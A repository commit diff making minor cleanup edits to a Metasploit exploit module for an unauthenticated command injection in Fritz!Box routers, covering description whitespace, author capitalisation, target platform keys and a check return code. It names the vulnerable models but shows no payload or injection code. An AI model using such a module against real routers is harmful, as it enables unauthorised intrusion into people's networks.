Do final / minor cleanup
parent
8dce80fd30
commit
386e2e3d29
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection',
|
||||
'Description' => %q{
|
||||
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
|
||||
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
|
||||
This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
|
||||
following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
|
||||
7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
|
||||
|
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # Vulnerability discovery
|
||||
'Unknown', # Vulnerability discovery
|
||||
'Fabian Braeunlein <fabian@breaking.systems>', # Metasploit PoC with wget method
|
||||
'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module
|
||||
],
|
||||
|
@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Feb 11 2014',
|
||||
'Privileged' => true,
|
||||
'Platform' => 'linux',
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
|
@ -49,13 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'MIPS Little Endian',
|
||||
{
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE
|
||||
}
|
||||
],
|
||||
[ 'MIPS Big Endian',
|
||||
{
|
||||
'Arch' => ARCH_MIPS,
|
||||
'Platform' => 'linux'
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPS
|
||||
}
|
||||
],
|
||||
],
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
return Exploit::CheckCode::Safe
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
|
|
Loading…
Reference in New Issue